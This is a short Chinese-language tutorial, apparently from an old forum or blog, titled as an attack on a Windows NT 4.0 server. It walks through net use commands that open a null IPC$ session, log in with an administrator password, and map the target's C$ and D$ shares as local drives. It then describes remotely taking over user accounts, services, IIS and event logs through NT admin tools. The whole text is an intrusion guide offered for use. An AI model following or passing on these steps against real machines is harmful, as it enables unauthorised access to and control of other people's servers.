我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
net use \\111.111.111.111\ipc$ "" /user:""
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
net view \\111.111.111.111
当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
net use x: \\111.111.111.111\c$
net use y: \\111.111.111.111\d$
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
2、管理目标NT的用户:
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
3、管理目标NT的服务
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
这样你可以管理目标NT上的服务,共享目录
4、IIS管理
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
目标NT的FTP、WWW服务你就可以重新配置
5、事件管理
“事件查看器”->连接到服务器->111.111.111.111
评论